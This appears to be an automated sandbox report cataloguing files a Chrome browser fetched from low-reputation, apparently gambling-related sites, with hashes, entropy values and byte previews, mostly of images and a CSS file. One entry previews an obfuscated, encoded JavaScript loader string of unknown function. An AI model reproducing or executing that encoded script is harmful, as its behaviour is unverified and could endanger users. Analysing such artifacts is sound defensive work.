                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://hg679.cc/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1877
                                                                                                                                                          Entropy (8bit):6.37720772895727
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8U8pcJ313DHFsiB7KpleFG2Y:xSBwknmWp892HFsI03
                                                                                                                                                          MD5:F79E6597A4B2FE7B4462A6419A9D6763
                                                                                                                                                          SHA1:24B5E143A47E7C655B2B981B5192F5B4E5803AAF
                                                                                                                                                          SHA-256:4F752C16D750C5E8BCC94105BFA1DF0CBF2FC0739592C045CE19DA33EC59735A
                                                                                                                                                          SHA-512:59BA5F516E0375E5EB306A0BC6C92A89CD64C5AEB3B9364952652F78FF76A93833D68AFADFDA5A5B821A6A3AD4A773E5F21851164A55EC65BCF26C8FA11D5D60
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10043.png
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:39+08:00" xmp:MetadataDate="2023-07-24T11:26:39+08:00" xmpMM:InstanceID="xmp.iid:05dc8479-3604-4e4b-8ace-0432e51c907a" xmpMM:DocumentID="xmp.did:E1A584F7F3A011E7A3A8D9167784E8E3" xmpMM:OriginalDocumentID="xmp.did:E1A5
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1102
                                                                                                                                                          Entropy (8bit):6.354586907240545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:U1hiyWwjx82lY2T37VX6oyJ3VoqG/+nKjc:auNn2vUrJ37RnKA
                                                                                                                                                          MD5:9D9825E157031DDB20C926E39A1B2717
                                                                                                                                                          SHA1:42FC9960E82C04A9D615F77A6D535E828B2B3F51
                                                                                                                                                          SHA-256:75A39B4FD5657500786DEC2A38C2F0F909DDB975A3DF963877F154535D6C55F4
                                                                                                                                                          SHA-512:330E6DD75E16E321145AB16C5AEF10CB5F355A5FBCD8927982CEE29B8CDBEF94B1EBFE13AFE82B4DAD5771AA980FB073E0B9CF3440DECD5D2C79FD2AB4D37C6D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:8623A41CF39411E7A46FAA286A920394" xmpMM:DocumentID="xmp.did:8623A41DF39411E7A46FAA286A920394"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8623A41AF39411E7A46FAA286A920394" stRef:documentID="xmp.did:8623A41BF39411E7A46FAA286A920394"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.'......IDATx.b...?.....@...Alytu.....L..*.W.....X.........5.2..f.4~...>.'.h<.....?...HL._..p=.......g i..M....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1753
                                                                                                                                                          Entropy (8bit):7.2761607200975185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Z1hNo7FCWwjx82lY2T3/VjVfHVPyJ3V5V2DVYGurcu5lZ+Jjp+yuOxOu2bCYWD6G:nzo7FDNn2DEJ3x2Six92TP3nPj9K9
                                                                                                                                                          MD5:5C967CC810AB472E43717C008C717FD9
                                                                                                                                                          SHA1:EB9D5C74A8A87DCDB570193DA7FFFFB43DFC0F89
                                                                                                                                                          SHA-256:901DF62919692708A4713E4F155CD839EE60493CB3B7861DDF28BDF27E5D3089
                                                                                                                                                          SHA-512:51AE08C7C9F1C0CED235240DDD943D93D6956221D7BBAE74F803C2839B932F5FFA2C54BE62618FF37D9B73ED584FDFA6F5BF39731262F8662C9473062FF2051C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A9B4901FA6D711E99C60DD743CA228EB" xmpMM:DocumentID="xmp.did:A9B49020A6D711E99C60DD743CA228EB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A9B4901DA6D711E99C60DD743CA228EB" stRef:documentID="xmp.did:A9B4901EA6D711E99C60DD743CA228EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...1...NIDATx.b...g..`b....Fs.3..H^Yi.c.....1Z...kiQ...Eo...Hx..>......_.....ru{cAd.P..G/.^...|..Uy..M4.0.<.._..u...r
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1629
                                                                                                                                                          Entropy (8bit):7.797647341288793
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:6xDIRIhjVZtX1Q70cDWnaayv6mgzLn6vcsWQDQ24sw3nUXAKuohuQjvCIK6:fOhdFs/SPjwWY4T3UQhtEqM
                                                                                                                                                          MD5:BDE554F4C3781BB7BDF86BDD79048BAB
                                                                                                                                                          SHA1:8DBC41C1E60159B369BC09483F9F9684281CCD12
                                                                                                                                                          SHA-256:D7A07AE290B30B3A4878C148A2AA2D38BB8A14B6B67F713888A6EBD4A23DAD34
                                                                                                                                                          SHA-512:C27D3C140193A2978DC11ABF3DEAAB891C5E09F1D3CDAF8C8D33CEA3F3B925E929FBCF4121B568C242435ED173D1075AE3880CA48FE354B48E47E4BF1D495D80
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-9.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...KI>90&...M=,.....3)...Q..m...ZF1...bnNB......[D........P`RBO-I.zZ.j5..g........?&.....i.....'...........~P.I.K......rG1- >3.......ljIAsZ9......e...u..m..7..yf...rU.b[X#..1 .......[9.=-%K4-,..{X=F,'9%#/...@.........{eQ`I;(..W#.......\.}<.....^.......l..Z.pY..X.]SSOR..5...(..@.. ..o.....>...z..1.)S..K......................v..s..s.revl.hi.L.GF.tB^T@hW:.../*.f&..%..#....~b.........f7.N&..h......W...^.yP.....e.Nj................v...........y_.Q........w~........?VwdWv..t..j.jvqZw%S.iJpbE..>HE>s=:..9../.A/wK*)!*..)WI..r.._.....Y..U........v.......j....S.....h..?..f..R..X....C..q..s.$..[......%X..H.vD....0.Sd......$...L}..z..g.ie.~c.lWR6U.}T..S.KP.FO.gM..H,EF.;Fm4E.uC.<.L9B.5..+..%..$.x........`..x..w..W........=tRNS..!.T..6...p.......f9......wnicT9...................d`MKIF..i.....IDAT(.b..`T...6`.&...R..ng...)k.#...ao...l.l.l..0.......nnv@.n...z.@q..X....=_..=..l.m.K.'Z)3C.[..up....o.......)9.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (336)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):54576
                                                                                                                                                          Entropy (8bit):5.101622859705417
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:PsgR4FlccsG7TCbzG3ArQDggkvudBtssvmp13FUcPGZ1SiS9EvlscovGF5XAso/F:PiRi
                                                                                                                                                          MD5:499A3A64BCF22609681F5337A6360C80
                                                                                                                                                          SHA1:FC05A8A391C8375EA4E47183ECA56A18BED8FCA7
                                                                                                                                                          SHA-256:5339BF22971B6400E64154DECC06B84FD4BE337C2758CC7CA565756C92C97894
                                                                                                                                                          SHA-512:FC75DD13778CB0EFCEA3B855DE5BB9556E6E3DD43A1C470F448F13F2B2299D871C0D650790C5F78F3A64E40B822C5CBCC24483AA0F2496D46BDA7B07AED9EB4B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/themes/hongbao.css
                                                                                                                                                          Preview:/*PC........-begin*/..com-advertisement-wrap.layui-layer { background-color: #fff !important; }..com-advertisement-wrap.layui-layer .layui-layer-setwin .layui-layer-close { border-color: #2d2d2d; color: #2d2d2d; }..com-advertisement { display: flex; height: 524px; padding: 4px 0; }..com-advertisement .advertisement-menu { flex: 30%; max-width: 30%; padding: 0; overflow-y: auto; }..com-advertisement .advertisement-menu ul { width: 100%; min-height: 100%; margin: 0; padding: 0 4px; overflow-y: auto; }..com-advertisement .advertisement-menu .menu-list-item { height: 52px; min-height: 52px; line-height: 1.5; margin-bottom: 4px; padding: 15px; border-radius: 4px; background-color: #f1f1f1; overflow: hidden; word-break: keep-all; white-space: nowrap; text-overflow: ellipsis; cursor: pointer; }..com-advertisement .advertisement-menu .menu-list-item:last-child { margin-bottom: 0; }..com-advertisement .advertisement-menu .menu-list-item:hover { background-color: #E3E3E3; }..com-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/ocs/cc.png?1717972881240
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1591
                                                                                                                                                          Entropy (8bit):7.180756184592004
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:QvG1hfvWwjx82lY2T3JVp5yJ3V1JbGVU5RQavM9Akhes45qL/WG82UC4mlb:QvMANn2NQJ3DJ0Oma09AhBq624mlb
                                                                                                                                                          MD5:E205026F54D5027F12BA6BC10F84D64E
                                                                                                                                                          SHA1:5919478A9B9BCEAB3FC4784794372B5A63834977
                                                                                                                                                          SHA-256:C1628466BEE5FB7B4195F05610E1231BB6864073856D87914B99F032252A1CF3
                                                                                                                                                          SHA-512:940EA54F41EE1E4C309D2F5B6C5946E026D7C6F6AACD07F252334C40CF8F33276BBD0E49273F815A4BDEEAC88341958426631DBA17A2623C8F50CABB7F846F0B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:72E5514A50A211E7B6E193861B955A3A" xmpMM:DocumentID="xmp.did:72E5514B50A211E7B6E193861B955A3A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:72E5514850A211E7B6E193861B955A3A" stRef:documentID="xmp.did:72E5514950A211E7B6E193861B955A3A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..$d....IDATx..Ol.Q..g.....kE.n"......sp.'.I%$....^E.E.\.......$.!.$.. TESVUT.nWZ....~_....z.g...w.......9..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37013
                                                                                                                                                          Entropy (8bit):7.99100171903598
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:BRq4t6g43dRcCVXdzsrkR3775poBVDiPbaNrQ8IQm/uiks0A/891:vB4/PVXh6kR5kVDizaN7IQm/uiksx/K1
                                                                                                                                                          MD5:8CE24388402E479013050EB3E0BFE597
                                                                                                                                                          SHA1:20FC8814742CAFD113EC4DF36933DDE7FCFB2E16
                                                                                                                                                          SHA-256:C1A4848084C407081F54083AD97D8F66BACD575F8517DBC5C00EFF9C1269CF2A
                                                                                                                                                          SHA-512:CFD501E8423146DDD0B5D9699A7C48867210AA3A0A10FF2113A69966D2217D706D8802B2FF88AAF459C6BE5D0C07E003E786BF04E90353189251C8D5B77AF40B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/card/ky_img.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:385B1076459011EABAEFCA67C4E9E386" xmpMM:DocumentID="xmp.did:385B1077459011EABAEFCA67C4E9E386"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:385B1074459011EABAEFCA67C4E9E386" stRef:documentID="xmp.did:385B1075459011EABAEFCA67C4E9E386"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx...|U.....q........Cp..D...V..:..U[.g...Z..u..*(.. .G ....{...?.{nB........!..g...}..3......<.d.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1924
                                                                                                                                                          Entropy (8bit):7.381935205755982
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DUioJ3C7mg+A+4QyGxtacTQJ7lMMsFn:zo7F52QiZ7mg7/etauM94n
                                                                                                                                                          MD5:12FBA25CCB3FAC095283A1AAC536AC93
                                                                                                                                                          SHA1:1B3BB42B050723D5B00E90CD9B9F947C6D3A1FAC
                                                                                                                                                          SHA-256:C509677279780CD23C0755810B0FCE3830B946FA44E3FE0EEF3F685C55FCCDDF
                                                                                                                                                          SHA-512:788E34DEF5AAB15A5DA0E94AAF282A18DD5E48AB938C44B2D8D62E90BD617CE3C01250502A2C36EA7577602AEBCEA94EEF6871D4A4227CD68BC317335C6818D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8067B06A6D711E9B5A0C4B8A318A102" xmpMM:DocumentID="xmp.did:A8067B07A6D711E9B5A0C4B8A318A102"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8067B04A6D711E9B5A0C4B8A318A102" stRef:documentID="xmp.did:A8067B05A6D711E9B5A0C4B8A318A102"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>@g.h....IDATx.b...g..`b..`./-.../..-)"...~...../.w.\..5A..q....ks.b.......%.^X..[..111B....^..%.FK...]l...i..v,|..?HpE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1920 x 3024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1499984
                                                                                                                                                          Entropy (8bit):7.964325054427544
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:FDOLg8AMif+mIjhx+2qlAxg5epohKMll4QL6Ku89gGpUZeEkCt6jGdBJ2rH+v:FOmpf2S2qlAxgcpohFOKu8nJE4j5rH+v
                                                                                                                                                          MD5:5D4C1E10E49C8C1D60E38B80604E5940
                                                                                                                                                          SHA1:6F9EC05E5F75B26E047608DD51BF8B2E50E43078
                                                                                                                                                          SHA-256:134F74FC2029EDB22E0C7EA1DDEAABDA653C57E924962673DA8F699306D44C17
                                                                                                                                                          SHA-512:1F5B079EBDF87277FF903AA1135AFF0D7DF58120C160B9D913DAE983CB4E62F79A894607638DE4CB4E79C0FE19E0C326650E799A7FB384E4A83F4E64CE666780
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............(E.. .IDATx^..Q.. .CAP1.J!../7...{f.r... @....... @....... @....... ..6....... @....... @....... @.......x..`.@....... @....... @....... @......8R..... @....... @....... @.......0....... @....... @....... @......D....". @....... @....... @....... @...... @....... @....... @....... @ "`...)...... @....... @....... @.......~....... @....... @....... @.......p.H1.. @....... @....... @....... `...... @....... @....... @...........#E.A....... @....... @....... @...... @....... @....... @....... @.@D...)R..... @....... @....... @............... @....... @....... @....."...H.b. @....... @....... @....... @...... @....... @....... @....... ..0.G......... @....... @....... @.....`?@....... @....... @....... @......8R..... @....... @....... @.......0....... @....... @....... @......D....". @....... @....... @....... @...... @....... @....... @....... @ "`...)...... @....... @....... @.......~....... @....... @....... @.......p.H1.. @....... @....... @....... `..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.845944771947073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VHQC6JX8y7EBsWWg0fflUGOW69XM3X89UBGPhZC75wCP3g2xHuf6bsWalp:Vw517EBpWgWfKzt1+BAhZC75wXSbsdlp
                                                                                                                                                          MD5:DFD335562D8D028292B8569586AB6902
                                                                                                                                                          SHA1:68EDA38D42D0F4BC5C60AF2C58CC33CD17280B6C
                                                                                                                                                          SHA-256:E95BAB46761928950BD59EBD8FE1C6A3D1FFDE89D2A6D79C730D0C74C5785646
                                                                                                                                                          SHA-512:47C2F125E8C97CE93DE0192641732D38B635B0F36FF2DDFF864DCCF2682FF5DAB27ECF1F7C9944DBA3736C45780A170D6B84ADAFE5953E82CEDB1DDE54BE5BB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/wrapper.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9dAFsoCABxEA4OGyRh7DEuJABlGyClEEoQNC4QfTFiYULyGBRZiHRTjiQGcjB0SWY2Th4y0TyFYseRoaQcXQgTAARgAzPhcMJdBwABanTAQsAmfR8Py+UhieQAc0IdgKwjGvigdhsP3Y3F4gOBoPBkJhsIALABWJGo9GY7G43z4sQAYQAjgA2ACi5LGsyQRIAQihOnS/ozyECOCCwRCoTlOby0WUBWgcWg8QSOQBqShkm5jUI2DgqtWsen/IZa5l6tkc2Gw4383RY81CkXQ+QAVQA0nLSPc0EF1v83eqGQCfTqWfrMIacsHTaHBZbhQTOgBJaG+BNQNChOxIHYZr1MnN+qFcuFFjEl8NlkVK1qUDkJjgoKByVua7W61kG+G9s0Wq1iACC0eilAThjOFxnWbnubZcKIy/7q/LYjMvkINATvi4KZy0Wih+9x877Ml+AvYavEVxX0aVFkfZ8QFfWo3g9DUj19Bd2QDf9SzXAANXAADUoATVA2H0D923nPM4UlHlkRNPsAIjAlxVaVpOgTCBFAALxAAB1NEQF8Qjs2I09YS5QsKJDajBwJKBRQAejHR1SFMUUFg4GAUSgXiv0Qs8gxE4sxLXIkmDMXYmJRZ4lWxEwiTMKwWAgdSEJI2FJWiFCBzXOgwENR8UCJEwlTsLwsX8eyO00zk/x0qjUOvFiABU6AALVwp5bCVFYQv4qEz3IvldOikVcBoBLazkrhHhQWwzCnJBgAqgjYMzT8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):663
                                                                                                                                                          Entropy (8bit):7.521694983048398
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7es/6Tn/YPc17zDKWgDaGJeF5t+/qBOotsnmHR5l9y:w/60Pc1/DKWg+GJA5FBBH7l9y
                                                                                                                                                          MD5:EF972EB21813224CC000334C3BC94A01
                                                                                                                                                          SHA1:EE1D39BF57907F6D9B42D140E07BDF1FF85ADD50
                                                                                                                                                          SHA-256:59386AFD3F9245FB3A774C44E4D6C720CD09D3E21F32C28BBEC26958CE2C87DF
                                                                                                                                                          SHA-512:451D4F0DB3D479439A77DA0194C293A4A859986546C68FB92F3BFC980EAC54785AFEC6F7283FC070B0A23C96727A09B37893F3A39918C2E822F944749B762FF1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_astar_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................IIDATH...K.Q...O.0."3.UEX...] *,.".....*...M.......B.A..$*..Y.VdT...Rj7..o..1...o...9.s.sR*c!9c.....g...8....G.Aj..d9P.....s ?t.".S...C.J...b.=....Z..Jr.S......5}.4.k.v.B.........1?..?q.........\......].......e.d`.P......{@G.Y.,.^...x...S.v.*..h.....N`%...V...R..v.(....#.]iTlSw....N..z)..N.V=.6..P[......}F,..}..;..1..y.....UEL..nQ?G..MF.w..Z.z..|S_.....l.I.V..L..P'...v..j.z6.^..s..$m%0!x..zmp&...K......R.).S`.PE..5............:. ..E.m.......<.......7.yQ.]Q...H."..5jI\.AG...t.Z......n....A.Z..Sg..#...VW...c$....9....+.. ....YP0"...k....Y.,.........S......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 13 x 15, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1231
                                                                                                                                                          Entropy (8bit):6.66519511317946
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Ox1hfvWwjx82lY2T3JVEw7VyJ3V7OoG6/OxOPUvyr0tXL0S:OfANn2NYJ3PRS1vr3
                                                                                                                                                          MD5:095384A3B8F6BDD2990AF1A72046314A
                                                                                                                                                          SHA1:5E28071F38D52C640E18BF0D7E6B8EF544421304
                                                                                                                                                          SHA-256:EBA7F5836E74727B61E9798568E1E702930E56976AE4553C789E7F9E2F564C9A
                                                                                                                                                          SHA-512:EBC28DB8D5C9945F4798C4EA41E009F5757082C6508BBFF7F67660A8DB46BFED6A96E20517F4EABC5ABA2A3859A2AF340ED77CCE2DFD83F720EEA8C17CEA17EF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/login/icon1.png
